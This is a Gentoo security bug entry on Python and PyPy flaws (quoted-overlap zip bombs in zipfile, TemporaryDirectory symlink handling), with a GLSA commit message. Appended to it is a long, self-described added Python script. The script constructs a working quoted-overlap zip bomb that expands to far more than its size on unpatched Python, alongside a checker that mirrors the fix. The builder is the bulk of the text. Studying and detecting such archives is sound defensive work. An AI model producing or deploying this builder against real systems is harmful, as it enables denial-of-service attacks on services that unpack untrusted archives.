| Field | Value |
|---|---|
| Summary | <dev-lang/python-{3.8.19,3.9.19,3.10.14,3.11.8,3.12.2}, <dev-python/pypy3_{9,10}-7.3.16: “quoted-overlap” zip-bombs in zipfile module, dereferencing symlinks in cleanup of TemporaryDirectory |
| Product | Gentoo Security |
| Reporter | Michał Górny <mgorny> |
| Component | Vulnerabilities |
| Assignee | Gentoo Security <security> |
| Status | RESOLVED FIXED |
| Severity | normal |
| Priority | Normal |
| Version | unspecified |
| Hardware | All |
| OS | Linux |
| Whiteboard | A1 [glsa+] |
| Package list | |
| Runtime testing required | --- |
| Bug Depends on | 927308, 927309, 927315, 929048, 929049, 929050, 930591 |
| Bug Blocks | |
Description

Michał Górny 2024-03-19 18:19:42 UTC

https://discuss.python.org/t/python-3-10-14-3-9-19-and-3-8-19-is-now-available/48993 lists more:

> gh-81194: a crash in socket.if_indextoname() with a specific value (UINT_MAX) was fixed. Relatedly, an integer overflow in socket.if_indextoname() on 64-bit non-Windows platforms was fixed

> gh-113659: .pth files with names starting with a dot or containing the hidden file attribute are now skipped

> gh-102388: iso2022_jp_3 and iso2022_jp_2004 codecs no longer read out of bounds

> gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads

Sigh, looks like upstream announcement was wrong: zipfile fix is already present in 3.11.8 and 3.12.2. tempfile fix is already present in 3.11.8 and 3.12.1. Everything else, except for the SSLContext thing, also seems to be present in older versions. However, that one doesn't seem like a real security issue at a first glance.

cleanup done.

The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/data/glsa.git/commit/?id=665ec86173a28118d28182d8381d593988f1adac

commit 665ec86173a28118d28182d8381d593988f1adac
Author:     GLSAMaker <glsamaker@gentoo.org>
AuthorDate: 2024-05-04 05:59:08 +0000
Commit:     Hans de Graaff <graaff@gentoo.org>
CommitDate: 2024-05-04 06:00:31 +0000

    [ GLSA 202405-01 ] Python, PyPy3: Multiple Vulnerabilities

    Bug: https://bugs.gentoo.org/884653
    Bug: https://bugs.gentoo.org/897958
    Bug: https://bugs.gentoo.org/908018
    Bug: https://bugs.gentoo.org/912976
    Bug: https://bugs.gentoo.org/919475
    Bug: https://bugs.gentoo.org/927299
    Signed-off-by: GLSAMaker <glsamaker@gentoo.org>
    Signed-off-by: Hans de Graaff <graaff@gentoo.org>

 glsa-202405-01.xml | 79 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 79 insertions(+)
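The “quoted-overlap” zip bomb named in the summary, as an added example that is not part of this bug report, the GLSA, or CPython's zipfile code: it builds a small archive of that shape in memory and runs the same overlap check the fixed zipfile applies. The entry names (file000.txt, ...), the 100 000-byte sample payload and all helper names are this example's own assumptions.

```python
import io
import struct
import zipfile
import zlib
from collections import namedtuple

# Constructed example, not CPython's code: a minimal "quoted-overlap" builder
# plus the overlap check that the fixed zipfile performs.  Entry names are made up.
LFH_SIG, CDH_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
LFH_FMT = "<4sHHHHHLLLHH"        # local file header: 30 bytes + name + extra
CDH_FMT = "<4sHHHHHHLLLHHHHHLL"  # central directory header: 46 bytes + name/extra/comment
EOCD_FMT = "<4s4H2LH"            # end of central directory: 22 bytes + comment
Entry = namedtuple("Entry", "name lfh crc csize usize")

def _lfh(name, crc, csize, usize):
    """Local header: version 2.0, no flags, method 8 (DEFLATE), zero timestamp."""
    return struct.pack(LFH_FMT, LFH_SIG, 20, 0, 8, 0, 0, crc, csize, usize, len(name), 0) + name

def _stored_block(data):
    """Non-final DEFLATE stored block: 0x00 (BFINAL=0, BTYPE=00), LEN, NLEN=~LEN, raw bytes.
    A decoder copies the bytes through, so the quoted bytes can double as a zip header."""
    assert len(data) < 0x10000
    return b"\x00" + struct.pack("<HH", len(data), len(data) ^ 0xFFFF) + data

def build_quoted_overlap_zip(n_files, plain):
    """N entries sharing one compressed kernel.  Entry i's stream opens with a stored
    block quoting entry i+1's local header, so every header after the first lies
    inside the compressed data of all entries before it."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, no zlib wrapper
    kernel = comp.compress(plain) + comp.flush()
    entries, comp_stream, plain_stream = [], kernel, plain  # last entry = bare kernel
    for i in reversed(range(n_files)):  # build last-to-first
        name, crc = b"file%03d.txt" % i, zlib.crc32(plain_stream)
        lfh = _lfh(name, crc, len(comp_stream), len(plain_stream))
        entries.append(Entry(name, lfh, crc, len(comp_stream), len(plain_stream)))
        comp_stream = _stored_block(lfh) + comp_stream  # the entry before quotes this header...
        plain_stream = lfh + plain_stream               # ...and so decompresses to it as well
    entries.reverse()
    body = comp_stream[5:]  # LFH_0 + quote(LFH_1) + quote(LFH_2) + ... + kernel
    offsets, pos = [], 0
    for e in entries:
        offsets.append(pos)
        pos += len(e.lfh) + 5  # the next header follows a 5-byte stored-block header
    cd = b"".join(struct.pack(CDH_FMT, CDH_SIG, 20, 20, 0, 8, 0, 0, e.crc, e.csize, e.usize,
                              len(e.name), 0, 0, 0, 0, 0, off) + e.name
                  for e, off in zip(entries, offsets))
    eocd = struct.pack(EOCD_FMT, EOCD_SIG, 0, 0, len(entries), len(entries), len(cd), len(body), 0)
    return body + cd + eocd

def build_plain_zip(files):
    """Ordinary archive written by the stdlib, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()

def parse_central_directory(zip_bytes):
    """Own central-directory reader (no ZIP64, no multi-disk, no archive comment that
    contains the EOCD signature).  Returns (cd_start, [(name, offset, csize, usize)])."""
    at = zip_bytes.rfind(EOCD_SIG)
    if at < 0:
        raise ValueError("no end-of-central-directory record")
    count, _, cd_start = struct.unpack(EOCD_FMT, zip_bytes[at:at + 22])[4:7]
    entries, pos = [], cd_start
    for _ in range(count):
        f = struct.unpack(CDH_FMT, zip_bytes[pos:pos + 46])
        if f[0] != CDH_SIG:
            raise ValueError("bad central directory header")
        nlen, xlen, clen = f[10:13]
        entries.append((zip_bytes[pos + 46:pos + 46 + nlen], f[16], f[8], f[9]))
        pos += 46 + nlen + xlen + clen
    return cd_start, entries

def _data_span(zip_bytes, offset, csize):
    """Start/end of an entry's compressed bytes, from its local header's name/extra lengths."""
    f = struct.unpack(LFH_FMT, zip_bytes[offset:offset + 30])
    if f[0] != LFH_SIG:
        raise ValueError("bad local header")
    start = offset + 30 + f[9] + f[10]
    return start, start + csize

def overlapping_entries(zip_bytes):
    """The fixed zipfile's check: sorted by offset, no entry's data may run past the
    next entry's local header (or, for the last entry, past the central directory)."""
    cd_start, entries = parse_central_directory(zip_bytes)
    entries.sort(key=lambda e: e[1])
    limits = [e[1] for e in entries[1:]] + [cd_start]
    return [e[0] for e, limit in zip(entries, limits)
            if _data_span(zip_bytes, e[1], e[2])[1] > limit]

def extract_entry(zip_bytes, name):
    """Inflate one entry the way an unchecked reader would: trust offset and size."""
    _, entries = parse_central_directory(zip_bytes)
    offset, csize = next((e[1], e[2]) for e in entries if e[0] == name)
    start, end = _data_span(zip_bytes, offset, csize)
    d = zlib.decompressobj(-15)
    return d.decompress(zip_bytes[start:end]) + d.flush()

if __name__ == "__main__":
    bomb = build_quoted_overlap_zip(5, b"A" * 100_000)
    claimed = sum(e[3] for e in parse_central_directory(bomb)[1])
    print(len(bomb), "bytes on disk,", claimed, "claimed; overlapping:", overlapping_entries(bomb))
```

With five entries the archive is well under a kilobyte on disk yet every entry but the last inflates to the whole 100 000-byte kernel output plus the quoted headers, and the expansion grows linearly with the entry count. The headers have to be quoted this way because zipfile has long rejected the simpler trick of pointing several directory entries at one local header: it compares the name in the local header with the directory name and raises BadZipFile on a mismatch. On the fixed releases listed in the summary, zipfile applies the same end-offset check as overlapping_entries() when an entry is opened, so reading file000.txt through file003.txt raises BadZipFile while file004.txt, whose data ends exactly at the central directory, still reads normally; on the unfixed releases all five extract in full.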